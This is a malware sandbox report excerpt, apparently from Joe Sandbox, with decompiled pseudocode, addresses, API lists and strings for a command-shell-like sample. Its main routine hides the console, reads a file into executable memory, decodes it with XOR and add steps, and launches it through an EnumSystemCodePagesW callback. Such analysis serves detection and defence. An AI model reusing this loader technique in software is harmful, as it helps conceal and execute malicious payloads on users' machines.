																	_v36 = 0;
																} else {
																	E00408CA0(_v20, _v36, _v92 - _v36 >> 1 << 1);
																	_t900 = _t900 + 0xc;
																	_v20[_v92 - _v36 >> 1] = 0;
																	_v36 = _v92 + 2;
																}
																if(GetFileAttributesW( &_v3200) == 0xffffffff) {
																	L100:
																	continue;
																} else {
																	do {
																		_t574 =  *0x4494a8; // 0x4533bc
																		if(( *_t574 & 8) != 0) {
																			_t860 =  *0x4494a8; // 0x4533bc
																			_v160 = _t860;
																			_v164 = 3;
																			E00406000(_v164, _v160, "wmain", "Found file as \'%s\'\n", E00406150( &_v3200));
																			_t900 = _t900 + 0x14;
																		}
																	} while (0 != 0);
																	_v52 = 1;
																	goto L100;
																}
															}
															L101:
															goto L119;
														} else {
															goto L85;
														}
														do {
															L85:
															_t862 =  *0x4494a8; // 0x4533bc
															if(( *_t862 & 8) != 0) {
																_t727 =  *0x4494a8; // 0x4533bc
																_v152 = _t727;
																_v156 = 3;
																E00406000(_v156, _v152, "wmain", "Found file as \'%s\'\n", E00406150( &_v3200));
																_t900 = _t900 + 0x14;
															}
														} while (0 != 0);
														_v52 = 1;
														goto L101;
													}
													return 0;
												}
												_t591 =  &_v19584;
												0x400000(_t591);
												if(_v108 < _t591) {
													goto L75;
												}
												goto L74;
											} else {
												if(( *_v20 & 0x0000ffff) == 0x20 || ( *_v20 & 0x0000ffff) == 9) {
													 *0x454c34 = 0;
												}
												_v20 =  &(_v20[1]);
												continue;
											}
										}
										goto L68;
									}
								} else {
									L127:
									0x400000( &_v3200);
									GetCurrentDirectoryW( &_v3200,  &_v3200);
									_t678 = 2;
									if(IsCharAlphaW( *(_t892 + 0xfffffffffffff384) & 0x0000ffff) == 0) {
										L133:
										if( *0x454c2c == 0) {
											GetStartupInfoW( &_v296);
											if(_v296.lpTitle == 0) {
												SetConsoleTitleW(E004011B0(_t472, 0x408));
											} else {
												SetConsoleTitleW(_v296.lpTitle);
											}
											if(_v68 == 0) {
												_v44 = 0;
												_v40 = 4;
												if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Command Processor", 0, 0x20019,  &_v32) == 0) {
													if(RegQueryValueExW(_v32, L"DefaultColor", 0,  &_v72, 0, 0) == 0) {
														if(_v72 != 4) {
															if(_v72 == 1) {
																_v40 = 8;
																RegQueryValueExW(_v32, L"DefaultColor", 0, 0,  &_v220,  &_v40);
																_t507 = E00415A03( &_v220,  &_v220, 0, 0xa);
																_t900 = _t900 + 0xc;
																_v44 = _t507;
															}
														} else {
															_v40 = 4;
															RegQueryValueExW(_v32, L"DefaultColor", 0, 0,  &_v44,  &_v40);
														}
													}
													RegCloseKey(_v32);
												}
												if(_v44 == 0 && RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Command Processor", 0, 0x20019,  &_v32) == 0) {
													if(RegQueryValueExW(_v32, L"DefaultColor", 0,  &_v72, 0, 0) == 0) {
														if(_v72 != 4) {
															if(_v72 == 1) {
																_v40 = 8;
																RegQueryValueExW(_v32, L"DefaultColor", 0, 0,  &_v228,  &_v40);
																_v44 = E00415A03(_v32,  &_v228, 0, 0xa);
															}
														} else {
															_v40 = 4;
															RegQueryValueExW(_v32, L"DefaultColor", 0, 0,  &_v44,  &_v40);
														}
													}
													RegCloseKey(_v32);
												}
												_t682 = (_v44 & 0x000000f0) >> 4;
												if((_v44 & 0x000000f0) >> 4 != (_v44 & 0x0000000f)) {
													 *0x4533cc = _v44 & 0x000000ff;
													_t682 = 2;
													 *0x0045B1C0 = 0;
													0x400000();
												}
											} else {
												_t682 = _v68 & 0x0000000f;
												if((_v68 & 0x000000f0) >> 4 != (_v68 & 0x0000000f)) {
													 *0x4533cc = _v68 & 0x000000ff;
													_t682 = 0;
													 *((short*)(0x45b1c0)) = 0;
													0x400000();
												}
											}
											if( *0x454c30 != 0) {
												E00401240( &_v28, _t889, _v24,  &_v28, 0xffffffff);
												E00404890(_t889, _v28, 0, 0);
												_t682 = _v28;
												E00403F40(_v28, _v28);
												_v28 = 0;
												0x400000(_v24);
											}
											 *0x456ef0 = 1;
											if( *0x454c30 == 0) {
												0x400000();
											}
											while(1 != 0) {
												if( *0x4533d0 != 0) {
													_t682 = _v116;
													E00405220(_t889, _v116);
												}
												if(E00401240(_t682, _t889, 0,  &_v28, GetStdHandle(0xfffffff6)) != 0) {
													E00404890(_t889, _v28, 0, 0);
													_t682 = _v28;
													E00403F40(_v28, _v28);
													if(_v28 == 0) {
														_v112 = 0;
													} else {
														_v112 = 1;
													}
													_v116 = _v112;
													_v28 = 0;
													continue;
												} else {
													break;
												}
											}
											return 0;
										}
										E00401240(_t678, _t889, _v24,  &_v28, 0xffffffff);
										E00404890(_t889, _v28, 0, 0);
										E00403F40(_v28, _v28);
										_v28 = 0;
										0x400000(_v24);
										return  *0x457190;
									}
									_t678 = 2 << 0;
									if((_a12245929 & 0x0000ffff) != 0x3a) {
										goto L133;
									}
									wsprintfW( &_v204, L"=%c:",  *(_t892 + 0xfffffffffffff384) & 0x0000ffff);
									_t900 = _t900 + 0xc;
									SetEnvironmentVariableW( &_v204,  &_v3200);
									do {
										_t472 =  *0x4494a8; // 0x4533bc
										if(( *_t472 & 8) != 0) {
											_t828 =  *0x4494a8; // 0x4533bc
											_v192 = _t828;
											_v196 = 3;
											_push(E00406150( &_v3200));
											_t472 = E00406000(_v196, _v192, "wmain", "Set %s to %s\n", E00406150( &_v204));
											_t900 = _t900 + 0x18;
										}
										_t678 = 0;
									} while (0 != 0);
									goto L133;
								}
							} else {
								goto L15;
							}
						}
						_t148 = _v80 + 0x407564; // 0x5025ff07
						switch( *((intOrPtr*)(( *_t148 & 0x000000ff) * 4 +  &M00407540))) {
							case 0:
								 *0x454c38 = 0;
								goto L32;
							case 1:
								 *0x454c2c = 1;
								goto L32;
							case 2:
								 *0x454c30 = 1;
								goto L32;
							case 3:
								_v100 = 1;
								goto L32;
							case 4:
								 *0x454c34 = 1;
								goto L32;
							case 5:
								__ecx = 2;
								__ecx = 2 << 1;
								__eax =  *(_v16 + (2 << 1)) & 0x0000ffff;
								if(__eax == 0x3a) {
									__ecx = 2;
									__eax = E00415A03(2, 6 + _v16, 0, 0x10);
									_v68 = __eax;
								}
								goto L32;
							case 6:
								 *0x454c38 = 1;
								goto L32;
							case 7:
								__eax = 2;
								__eax = 2 << 1;
								__ecx = _v16;
								if(( *(__ecx + (2 << 1)) & 0x0000ffff) == 0x3a) {
									__eax = 2;
									6 = 6 + _v16;
									__eax = E0042B7E2(__ebx, __edi, __esi, 6 + _v16, L"OFF", 3);
									 *0x454c28 = __eax;
								}
								goto L32;
							case 8:
								goto L32;
						}
					} else {
						L15:
						_v16 = _v16 + 2;
						continue;
					}
				}
				goto L36;
				L11:
				if(( *_v48 & 0x0000ffff) == 0 || ( *_v48 & 0x0000ffff) == 0x2f) {
					 *0x454c34 = 0;
					_t672 =  *0x454c34; // 0x0
					_v100 = _t672;
					 *0x454c30 = _v100;
					_t462 =  *0x454c30; // 0x0
					 *0x454c2c = _t462;
					_v16 = _v48;
					goto L16;
				} else {
					_v48 =  &(_v48[1]);
					goto L11;
				}
				L3:
				 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x00000002;
				 *(_v12 + _v8) =  *(_v12 + _v8) + 0x11;
				 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
				 *(_v12 + _v8) =  *(_v12 + _v8) + 0x80;
				 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x00000042;
				 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
				 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
				 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x0000002f;
				 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
				 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
				 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x00000093;
				 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
				 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
				 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
				 *(_v12 + _v8) =  *(_v12 + _v8) + 0xf6;
				 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
				 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x0000005e;
				 *(_v12 + _v8) =  *(_v12 + _v8) + 0x22;
				 *(_v12 + _v8) =  *(_v12 + _v8) ^ 0x000000a0;
				_v8 = _v8 + 1;
				if(_v8 >= _v96) {
					EnumSystemCodePagesW(_v12, 0); // executed
					_t667 = _v76;
					_t441 = E00413B60(_v76);
					_t896 = _t895 + 4;
					0x400000( &_v1152);
					_t443 = GetEnvironmentVariableW(L"COMSPEC",  &_v1152, _t441);
					if(_t443 == 0) {
						0x400000( &_v1152);
						0x400000(L"\\cmd.exe");
						GetSystemDirectoryW( &_v1152, _t443 - _t443);
						lstrcatW( &_v1152, L"\\cmd.exe");
						_t667 =  &_v1152;
						SetEnvironmentVariableW(L"COMSPEC",  &_v1152);
					}
					_t445 = E00415AA2(_t667, E00405F90(0));
					_v632 = 0x11c;
					0x400000( &_v632);
					lstrcpyW(0x456fe0, E004011B0(_t445, 0x407));
					_push(_v620);
					_push(_v624);
					_t452 = E00403E90(E004011B0(E00405F50( &_v348, "%ld.%ld.%ld", _v628), 0x409),  &_v348);
					_t900 = _t896 + 0x24;
					_v24 = _t452;
					lstrcpyW(0x456f00, _v24);
					LocalFree(_v24);
					_v24 = 0;
					_v48 = GetCommandLineW();
					goto L8;
				} else {
					goto L3;
				}
			}

0x004064b0
0x004064b8
0x004064be
0x004064c5
0x004064cc
0x004064d3
0x004064da
0x004064e1
0x004064eb
0x004064f2
0x004064fb
0x00406502
0x00406508
0x0040650d
0x00406512
0x00406515
0x0040651c
0x00000000
0x0040651e
0x00406530
0x00406535
0x00406559
0x0040655f
0x0040656e
0x0040657e
0x00406584
0x0040659c
0x0040659c
0x0040686c
0x0040686c
0x0040686c
0x00406878
0x0040687a
0x0040687f
0x00406882
0x004068a5
0x004068aa
0x004068aa
0x004068ad
0x00000000
0x00406908
0x00406928
0x0040693c
0x00406941
0x00406947
0x00406950
0x00406957
0x00406a1f
0x00406a26
0x00406a37
0x00000000
0x00406a41
0x00406a57
0x00406a5c
0x00406a61
0x00000000
0x00000000
0x00406a69
0x00406a69
0x00406a72
0x00406a79
0x00406a79
0x00406a7e
0x00406a92
0x00406a9f
0x00406aae
0x00406ab5
0x00406ac5
0x00406acf
0x00406ad7
0x00406adc
0x00406adf
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae6
0x00406af9
0x00406b04
0x00406b09
0x00406b0c
0x00406b13
0x00406b15
0x00406b15
0x00406b13
0x00406b26
0x00406b31
0x00406b36
0x00406b3b
0x00406b3d
0x00406b3d
0x00406b3b
0x00406b4e
0x00406c02
0x00406c02
0x00406c0e
0x00406c10
0x00406c16
0x00406c19
0x00406c3c
0x00406c41
0x00406c41
0x00406b54
0x00406b54
0x00406b61
0x00406b64
0x00406b79
0x00406bc8
0x00406c02
0x00000000
0x00000000
0x00406c4f
0x004070eb
0x004070f2
0x00407103
0x00407103
0x00000000
0x004070f2
0x00406c5d
0x00406c61
0x00406c66
0x00406c69
0x00406c77
0x00406c8f
0x00406c96
0x00406ca9
0x00406cb5
0x00406cbb
0x00406cbb
0x00406cbb
0x00406cc7
0x00406cc9
0x00406ccf
0x00406cd5
0x00406d01
0x00406d06
0x00406d06
0x00406d09
0x00406d13
0x00406d18
0x00406d1d
0x00406f32
0x00406f48
0x00406fb0
0x00406fb3
0x00406fcd
0x00406fd2
0x00406fd5
0x00406fdc
0x00406ff1
0x00406fde
0x00406fe3
0x00406fe9
0x00406fec
0x00406fec
0x00407008
0x00407020
0x00407088
0x0040708b
0x00000000
0x00407022
0x00407022
0x00407022
0x0040702e
0x00407030
0x00407036
0x0040703c
0x0040704f
0x00407075
0x0040707a
0x0040707a
0x0040707d
0x00407081
0x00000000
0x00407081
0x00407020
0x00407093
0x00407097
0x00000000
0x00000000
0x00000000
0x00000000
0x00407099
0x00407099
0x00407099
0x004070a5
0x004070a7
0x004070ad
0x004070b3
0x004070bd
0x004070c2
0x004070cd
0x004070d4
0x004070d5
0x004070da
0x004070da
0x004070dd
0x004070e1
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f4a
0x00406f4a
0x00406f4a
0x00406f56
0x00406f58
0x00406f5d
0x00406f63
0x00406f92
0x00406f97
0x00406f97
0x00406f9a
0x00406f9e
0x00000000
0x00406f9e
0x00406d33
0x00406d44
0x00406d4d
0x00406d4d
0x00406d59
0x00406d5b
0x00406d60
0x00406d66
0x00406d95
0x00406d9a
0x00406d9a
0x00406d9d
0x00406db5
0x00406dc8
0x00406e31
0x00406e34
0x00406e4e
0x00406e53
0x00406e56
0x00406e5d
0x00406e9e
0x00406ea4
0x00406e5f
0x00406e72
0x00406e77
0x00406e87
0x00406e91
0x00406e91
0x00406ebb
0x00406f18
0x00000000
0x00406ebd
0x00406ebd
0x00406ebd
0x00406ec8
0x00406eca
0x00406ed0
0x00406ed6
0x00406f05
0x00406f0a
0x00406f0a
0x00406f0d
0x00406f11
0x00000000
0x00406f11
0x00406ebb
0x00406f1d
0x00000000
0x00000000
0x00000000
0x00000000
0x00406dca
0x00406dca
0x00406dca
0x00406dd6
0x00406dd8
0x00406dde
0x00406de4
0x00406e13
0x00406e18
0x00406e18
0x00406e1b
0x00406e1f
0x00000000
0x00406e1f
0x00000000
0x00406d46
0x00406c98
0x00406c9f
0x00406ca7
0x00000000
0x00000000
0x00000000
0x00406bd4
0x00406bdd
0x00406bea
0x00406bea
0x00406bfa
0x00000000
0x00406bfa
0x00406b79
0x00000000
0x00406b64
0x00407108
0x00407108
0x00407116
0x0040711c
0x00407122
0x0040713b
0x004071f5
0x004071fc
0x00407244
0x00407251
0x0040726d
0x00407253
0x0040725a
0x0040725a
0x00407277
0x004072b8
0x004072bf
0x004072e3
0x00407304
0x0040730a
0x00407334
0x00407336
0x00407355
0x00407366
0x0040736b
0x0040736e
0x0040736e
0x0040730c
0x0040730c
0x00407328
0x00407328
0x0040730a
0x00407375
0x00407375
0x0040737f
0x004073c3
0x004073c9
0x004073f3
0x004073f5
0x00407414
0x0040742d
0x0040742d
0x004073cb
0x004073cb
0x004073e7
0x004073e7
0x004073c9
0x00407434
0x00407434
0x00407443
0x0040744e
0x00407458
0x0040745d
0x00407467
0x0040746e
0x0040746e
0x00407279
0x00407287
0x0040728c
0x00407297
0x004072a2
0x004072a7
0x004072ae
0x004072ae
0x004072b3
0x0040747a
0x00407486
0x00407493
0x00407498
0x0040749c
0x004074a1
0x004074ac
0x004074ac
0x004074b1
0x004074c2
0x004074c4
0x004074c4
0x004074c9
0x004074d9
0x004074db
0x004074df
0x004074df
0x004074fa
0x00407506
0x0040750b
0x0040750f
0x00407518
0x00407523
0x0040751a
0x0040751a
0x0040751a
0x0040752d
0x00407530
0x00000000
0x004074fc
0x00000000
0x004074fc
0x004074fa
0x00000000
0x00407539
0x00407208
0x00407215
0x0040721e
0x00407223
0x0040722e
0x00000000
0x00407233
0x00407146
0x00407154
0x00000000
0x00000000
0x00407177
0x0040717d
0x0040718e
0x00407194
0x00407194
0x0040719f
0x004071a1
0x004071a7
0x004071ad
0x004071c3
0x004071e9
0x004071ee
0x004071ee
0x004071f1
0x004071f1
0x00000000
0x00407194
0x00406a3c
0x00000000
0x00406a3c
0x00406a26
0x00406960
0x00406967
0x00000000
0x0040696e
0x00000000
0x00000000
0x0040697d
0x00000000
0x00000000
0x0040698c
0x00000000
0x00000000
0x0040699b
0x00000000
0x00000000
0x004069a4
0x00000000
0x00000000
0x004069b0
0x004069b5
0x004069ba
0x004069c1
0x004069c7
0x004069d3
0x004069db
0x004069db
0x00000000
0x00000000
0x004069e0
0x00000000
0x00000000
0x004069ec
0x004069f1
0x004069f3
0x004069fd
0x00406a06
0x00406a0e
0x00406a12
0x00406a1a
0x00406a1a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040692a
0x004068ff
0x00406905
0x00000000
0x00406905
0x00406928
0x00000000
0x004068b1
0x004068b9
0x004068d1
0x004068db
0x004068e1
0x004068e7
0x004068ed
0x004068f2
0x004068fa
0x00000000
0x004068c6
0x004068cc
0x00000000
0x004068cc
0x004065a2
0x004065b4
0x004065c8
0x004065db
0x004065f2
0x00406606
0x00406619
0x0040662c
0x00406640
0x00406653
0x00406666
0x0040667d
0x00406690
0x004066a3
0x004066b6
0x004066cd
0x004066e0
0x004066f4
0x00406708
0x0040671f
0x00406727
0x00406730
0x0040673d
0x00406743
0x00406747
0x0040674c
0x00406756
0x00406768
0x00406770
0x00406779
0x00406785
0x00406794
0x004067a6
0x004067ac
0x004067b8
0x004067b8
0x004067c9
0x004067d1
0x004067e2
0x004067f7
0x00406803
0x0040680a
0x00406838
0x0040683d
0x00406840
0x0040684c
0x00406856
0x0040685c
0x00406869
0x00000000
0x00406732
0x00000000
0x00406732

APIs

GetConsoleWindow.KERNELBASE(00000000), ref: 004064FB
ShowWindow.USER32(00000000), ref: 00406502
CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406559
GetFileSize.KERNEL32(?,00000000), ref: 00406568
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0040657E
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0040659C

Strings

$P$G, xrefs: 00406A88
wmain, xrefs: 00406EF2
PATHEXT, xrefs: 00406C84
OFF, xrefs: 00406A74
DefaultColor, xrefs: 0040731F
wmain, xrefs: 004071D6
/c command line: '%s', xrefs: 00406C2A
OFF, xrefs: 00406A01
DefaultColor, xrefs: 004073B2
Found file as '%s', xrefs: 00406EED
DefaultColor, xrefs: 0040734C
=%c:, xrefs: 0040716B
DefaultColor, xrefs: 004072F3
PROMPT, xrefs: 00406A8D
DefaultColor, xrefs: 0040740B
wmain, xrefs: 004070C2
COMSPEC, xrefs: 00406763
\cmd.exe, xrefs: 00406780
Software\Microsoft\Command Processor, xrefs: 004072D1, 00407390
Full path name '%s', xrefs: 00406D7D
Full commandline '%s', xrefs: 00406893
wmain, xrefs: 00407062
COMSPEC, xrefs: 004067B3
wmain, xrefs: 00406898
wmain, xrefs: 00406CEE
,=;, xrefs: 00406A52
Found on path as '%s' with extension '%s', xrefs: 0040705D
DefaultColor, xrefs: 004073DE
Found on path as '%s', xrefs: 00406F7A
\cmd.exe, xrefs: 0040679A
%ld.%ld.%ld, xrefs: 00406812
Binary not found, dropping back to old behaviour, xrefs: 004070BD
Set %s to %s, xrefs: 004071D1
Found file as '%s', xrefs: 00406DFB
wmain, xrefs: 00406E00
First parameter is '%s', xrefs: 00406CE9
wmain, xrefs: 00406C2F
wmain, xrefs: 00406F7F
.bat;.com;.cmd;.exe, xrefs: 00406CA9
wmain, xrefs: 00406D82

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: File$Window$AllocConsoleCreateReadShowSizeVirtual
String ID: ,=;$$P$G$%ld.%ld.%ld$.bat;.com;.cmd;.exe$/c command line: '%s'$=%c:$Binary not found, dropping back to old behaviour$COMSPEC$COMSPEC$DefaultColor$DefaultColor$DefaultColor$DefaultColor$DefaultColor$DefaultColor$First parameter is '%s'$Found file as '%s'$Found file as '%s'$Found on path as '%s'$Found on path as '%s' with extension '%s'$Full commandline '%s'$Full path name '%s'$OFF$OFF$PATHEXT$PROMPT$Set %s to %s$Software\Microsoft\Command Processor$\cmd.exe$\cmd.exe$wmain$wmain$wmain$wmain$wmain$wmain$wmain$wmain$wmain$wmain
API String ID: 3075330158-2512320786
Opcode ID: 00c337148118d14ea30799bea63fe36d3441d3a47769832d6c0fb8dc47ee9557
Instruction ID: 007536b626652c9deec188d0a985cd53575acafb21e32ee271909f852c1aac5e
Opcode Fuzzy Hash: 00c337148118d14ea30799bea63fe36d3441d3a47769832d6c0fb8dc47ee9557
Instruction Fuzzy Hash: 6BB2AF71D04208EBDB14DFA4DC85BAEB7B5AF49309F1040AAE505BB2C1D779AE84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040812D Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040812D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0040813C); // executed
				return _t1;
			}

0x00408132
0x00408138

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0000813C,004078E3), ref: 00408132

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8b7f07bb8ae6a390eb0cfdb0ce8ba72b0795242469a5119fa7049724355a11ba
Instruction ID: d91d9bc41a3dfa27be532cafa955177fcc68f9a8e966028edc9a976c0769ea92
Opcode Fuzzy Hash: 8b7f07bb8ae6a390eb0cfdb0ce8ba72b0795242469a5119fa7049724355a11ba
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004078F0 Relevance: 7.6, APIs: 5, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E004078F0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t13;
				intOrPtr _t20;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;
				void* _t27;
				char _t28;
				void* _t30;
				char _t32;
				intOrPtr _t34;
				void* _t37;
				char _t40;
				void* _t42;
				void* _t57;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				void* _t71;

				_t65 = __esi;
				_t61 = __edi;
				_t60 = __edx;
				_t42 = __ecx;
				E00407EB9();
				_push(0x14);
				_push(0x450fc0);
				E00408200(__ebx, __edi, __esi);
				_t13 = E00407C6E(_t42, __edx, 1); // executed
				if(_t13 == 0) {
					L19:
					E00407F97(_t60, _t61, _t65, 7);
					goto L20;
				} else {
					_t40 = 0;
					 *((char*)(_t71 - 0x19)) = 0;
					 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
					 *((char*)(_t71 - 0x24)) = E00407B73();
					_t20 =  *0x455c5c;
					if(_t20 == 1) {
						goto L19;
					} else {
						if(_t20 != 0) {
							_t40 = 1;
							 *((char*)(_t71 - 0x19)) = 1;
							goto L8;
						} else {
							 *0x455c5c = 1;
							_t37 = E0042871E(0x4492dc, 0x4492f4); // executed
							_pop(_t57);
							if(_t37 == 0) {
								E004286D9(_t57, 0x4492d0, 0x4492d8); // executed
								 *0x455c5c = 2;
								L8:
								E00407DC2( *((intOrPtr*)(_t71 - 0x24)));
								_t66 = E00407F8B();
								__eflags =  *_t66;
								if(__eflags != 0) {
									_push(_t66);
									_t34 = E00407D2E(_t40, 0, _t66, __eflags);
									__eflags = _t34;
									if(_t34 != 0) {
										 *0x4492c4(0, 2, 0);
										 *((intOrPtr*)( *_t66))();
									}
								}
								_t67 = E00407F91();
								__eflags =  *_t67;
								if(__eflags != 0) {
									_push(_t67);
									_t32 = E00407D2E(_t40, 0, _t67, __eflags);
									__eflags = _t32;
									if(_t32 != 0) {
										_push( *_t67);
										E00428B75(_t40, _t60, 0, _t67);
									}
								}
								_t24 = E004286BB();
								_t25 = E00428E49();
								_t26 = E00428E3D();
								_push(_t24);
								_push( *_t25);
								_push( *_t26); // executed
								_t27 = E004064B0(_t40, _t24, __eflags); // executed
								_t65 = _t27;
								_t28 = E004080EB();
								__eflags = _t28;
								if(_t28 == 0) {
									L20:
									E00428B9B(_t65);
									E00428B58( *((intOrPtr*)(_t71 - 0x20)));
									asm("int3");
									_push(E00407F07());
									return E00427EAC(_t60);
								} else {
									__eflags = _t40;
									if(_t40 == 0) {
										E00428B49();
									}
									E00407DDF(1, 0);
									 *(_t71 - 4) = 0xfffffffe;
									_t30 = _t65;
									goto L18;
								}
							} else {
								 *(_t71 - 4) = 0xfffffffe;
								_t30 = 0xff;
								L18:
								 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0x10));
								return _t30;
							}
						}
					}
				}
			}

0x004078f0
0x004078f0
0x004078f0
0x004078f0
0x004078f0
0x004078fa
0x004078fc
0x00407901
0x00407908
0x00407910
0x00407a66
0x00407a68
0x00000000
0x00407916
0x00407916
0x00407918
0x0040791b
0x00407924
0x00407927
0x00407931
0x00000000
0x00407937
0x00407939
0x00407984
0x00407986
0x00000000
0x0040793b
0x0040793b
0x0040794b
0x00407951
0x00407954
0x00407971
0x00407978
0x00407989
0x0040798c
0x00407997
0x0040799b
0x0040799d
0x0040799f
0x004079a0
0x004079a6
0x004079a8
0x004079b2
0x004079b8
0x004079b8
0x004079a8
0x004079bf
0x004079c1
0x004079c3
0x004079c5
0x004079c6
0x004079cc
0x004079ce
0x004079d0
0x004079d2
0x004079d7
0x004079ce
0x004079d8
0x004079df
0x004079e6
0x004079eb
0x004079ec
0x004079ed
0x004079ef
0x004079f7
0x004079f9
0x004079fe
0x00407a00
0x00407a6d
0x00407a6e
0x00407a76
0x00407a7b
0x00407a81
0x00407a88
0x00407a02
0x00407a02
0x00407a04
0x00407a06
0x00407a06
0x00407a0f
0x00407a16
0x00407a1d
0x00000000
0x00407a1d
0x00407956
0x00407956
0x0040795d
0x00407a56
0x00407a59
0x00407a65
0x00407a65
0x00407954
0x00407939
0x00407931

APIs

___security_init_cookie.LIBCMT ref: 004078F0

Part of subcall function 00407EB9: ___get_entropy.LIBCMT ref: 00407ED3

___scrt_release_startup_lock.LIBCMT ref: 0040798C
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 004079A0
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 004079C6
___scrt_uninitialize_crt.LIBCMT ref: 00407A0F

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ___scrt_is_nonwritable_in_current_image$___get_entropy___scrt_release_startup_lock___scrt_uninitialize_crt___security_init_cookie
String ID:
API String ID: 2539496024-0
Opcode ID: 52a75d8dd35c78f67ef31cdd269d422aba23a3f8905cfc22aaa3281ac59fe02d
Instruction ID: b8e05e901423636290703e972b6469dc39f96aff0b6cf00a8220497cea5e2857
Opcode Fuzzy Hash: 52a75d8dd35c78f67ef31cdd269d422aba23a3f8905cfc22aaa3281ac59fe02d
Instruction Fuzzy Hash: 3031F232B493119AEB217B72A802B6E77609F01729F24047FF041772D3CE7D6D019A5E

Uniqueness

Uniqueness Score: -1.00%

Function 00430614 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00430614() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x456b18 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
